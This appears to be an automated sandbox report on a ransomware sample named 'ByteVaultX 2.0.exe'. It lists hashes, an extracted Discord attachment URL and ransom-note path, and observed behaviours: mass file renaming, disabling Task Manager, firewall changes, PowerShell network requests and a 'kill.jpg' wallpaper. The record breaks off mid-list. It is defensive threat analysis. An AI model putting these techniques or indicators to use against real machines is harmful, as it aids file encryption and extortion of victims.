Analysis
-
max time kernel
1050s -
max time network
1051s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
25/05/2024, 23:42
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win11-20240426-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
d4c033244c9bf694cf7063f136b01e30
-
SHA1
a460178565327d0a0b756d165ff0fa3aae5f7abe
-
SHA256
1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
-
SHA512
78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d
-
SSDEEP
196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (156) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 64 IoCs
flow pid Process 17 1156 powershell.exe 18 2424 powershell.exe 19 4072 powershell.exe 20 2956 powershell.exe 21 388 powershell.exe 22 2840 powershell.exe 23 2668 powershell.exe 26 4588 powershell.exe 27 3472 powershell.exe 30 2044 powershell.exe 31 3372 powershell.exe 32 4248 powershell.exe 33 4500 powershell.exe 34 4572 powershell.exe 36 452 powershell.exe 37 1448 powershell.exe 38 740 powershell.exe 39 2880 powershell.exe 40 2316 powershell.exe 41 3968 powershell.exe 42 1948 powershell.exe 43 4636 powershell.exe 44 1444 powershell.exe 45 4056 powershell.exe 46 5060 powershell.exe 47 3564 powershell.exe 48 2396 powershell.exe 49 3392 powershell.exe 51 1136 powershell.exe 52 1992 powershell.exe 53 1060 powershell.exe 54 2340 powershell.exe 55 1532 powershell.exe 56 4532 powershell.exe 57 3576 powershell.exe 58 240 powershell.exe 60 2904 Process not Found 63 1100 Process not Found 64 1572 Process not Found 65 5032 Process not Found 66 200 Process not Found 68 732 Process not Found 69 4988 Process not Found 70 3916 Process not Found 71 1156 Process not Found 72 2316 Process not Found 73 1176 Process not Found 74 2012 Process not Found 75 1440 Process not Found 76 2520 Process not Found 78 4048 Process not Found 79 408 Process not Found 80 2944 Process not Found 81 4352 Process not Found 83 4600 Process not Found 84 4512 Process not Found 85 1884 Process not Found 86 1656 Process not Found 87 2788 Process not Found 88 2068 Process not Found 89 1924 Process not Found 90 3952 Process not Found 91 4024 Process not Found 92 3736 Process not Found -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
pid Process 976 netsh.exe 900 Process not Found 3392 Process not Found 3136 Process not Found 4432 Process not Found 1156 netsh.exe 3192 netsh.exe 4756 Process not Found 4704 Process not Found 916 Process not Found 1748 Process not Found 948 Process not Found 1884 netsh.exe 4012 netsh.exe 4288 Process not Found 3916 Process not Found 3436 Process not Found 2044 Process not Found 2096 Process not Found 2464 Process not Found 1568 Process not Found 3808 Process not Found 2236 Process not Found 4532 Process not Found 2516 Process not Found 3500 Process not Found 3952 netsh.exe 1924 Process not Found 4900 Process not Found 4816 Process not Found 4048 netsh.exe 4352 Process not Found 1112 Process not Found 2688 netsh.exe 2168 netsh.exe 2108 Process not Found 1376 netsh.exe 4704 Process not Found 1528 Process not Found 3008 netsh.exe 2176 Process not Found 3416 Process not Found 4300 netsh.exe 1200 netsh.exe 2912 netsh.exe 4548 Process not Found 1304 Process not Found 5032 Process not Found 4532 netsh.exe 4972 netsh.exe 2376 netsh.exe 4812 netsh.exe 1408 netsh.exe 3464 Process not Found 1904 Process not Found 4380 Process not Found 5040 Process not Found 1088 Process not Found 3404 netsh.exe 1992 Process not Found 1096 Process not Found 1976 Process not Found 248 Process not Found 2328 Process not Found -
Loads dropped DLL 12 IoCs
pid Process 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe 4228 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe -
pid Process 3016 Process not Found 1212 powershell.exe 2232 powershell.exe 2040 powershell.exe 2008 powershell.exe 1156 Process not Found 3808 Process not Found 4988 Process not Found 1324 Process not Found 3292 Process not Found 8 powershell.exe 1572 powershell.exe 2668 powershell.exe 3264 Process not Found 4248 Process not Found 2632 powershell.exe 4072 Process not Found 4760 Process not Found 4516 Process not Found 4904 Process not Found 1824 Process not Found 4636 Process not Found 4092 Process not Found 4724 powershell.exe 5080 powershell.exe 4588 powershell.exe 2956 powershell.exe 396 Process not Found 4584 powershell.exe 2152 powershell.exe 2352 Process not Found 4720 powershell.exe 1704 powershell.exe 484 powershell.exe 2604 powershell.exe 2836 Process not Found 3952 Process not Found 2888 Process not Found 2252 powershell.exe 3372 powershell.exe 2668 powershell.exe 1084 Process not Found 4516 Process not Found 884 Process not Found 5056 Process not Found 2500 Process not Found 4584 powershell.exe 3164 powershell.exe 4556 Process not Found 4092 Process not Found 2444 Process not Found 1908 Process not Found 4440 Process not Found 3328 Process not Found 2772 powershell.exe 4800 powershell.exe 3876 powershell.exe 956 powershell.exe 732 Process not Found 3008 Process not Found 4264 Process not Found 4216 powershell.exe 396 powershell.exe 3968 Process not Found -
Sets desktop wallpaper using registry 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4844 powershell.exe 4844 powershell.exe 1956 msedge.exe 1956 msedge.exe 2640 msedge.exe 2640 msedge.exe 3272 powershell.exe 3272 powershell.exe 3812 powershell.exe 3812 powershell.exe 4984 powershell.exe 4984 powershell.exe 1216 powershell.exe 1216 powershell.exe 1400 powershell.exe 1400 powershell.exe 4880 identity_helper.exe 4880 identity_helper.exe 3744 powershell.exe 2528 msedge.exe 2528 msedge.exe 3744 powershell.exe 4896 powershell.exe 4896 powershell.exe 4216 powershell.exe 4216 powershell.exe 920 powershell.exe 920 powershell.exe 1808 powershell.exe 1808 powershell.exe 244 powershell.exe 244 powershell.exe 1156 powershell.exe 1156 powershell.exe 3568 powershell.exe 3568 powershell.exe 3120 powershell.exe 3120 powershell.exe 3120 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 2496 powershell.exe 2496 powershell.exe 2496 powershell.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 2412 powershell.exe 2412 powershell.exe 2412 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 4940 powershell.exe 4940 powershell.exe 4940 powershell.exe 1704 powershell.exe 1704 powershell.exe 1704 powershell.exe 4524 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 3812 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 244 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4724 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 5104 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2956 